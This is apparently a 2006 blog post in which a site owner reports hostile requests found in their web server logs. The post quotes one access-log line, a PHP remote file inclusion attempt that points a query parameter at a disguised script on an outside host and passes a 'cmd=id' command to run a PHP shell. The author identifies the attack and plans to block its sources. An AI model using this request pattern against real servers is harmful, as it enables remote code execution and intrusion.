I saw two interesting things in my server logs this morning.. 2 similar attempts:
---
201-13-106-48.dsl.telesp.net.br - - [07/Mar/2006:07:26:07 -0600] "GET /archives/category/irritations/index.php?showresults=http://www.moonyoung.seoul.kr/zboard/data/
food/pc110002.jpg?&cmd=id HTTP/1.0" 200 32770 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
---
The link at the end of that query is not an image. It's a script that attempts to open up some sort of php shell.
I got another hit of the same type, and from the same Brazilain IP range and without even looking figure its the same crap.
Im not sure what harm can be done, and honestly, Im not willing to try, but I will be blocking some more brazilian "friends" as well as anything related to the .kr domain.
According to zone-h, that domain was rooted on 2/20 by some brazilians.. how nice.
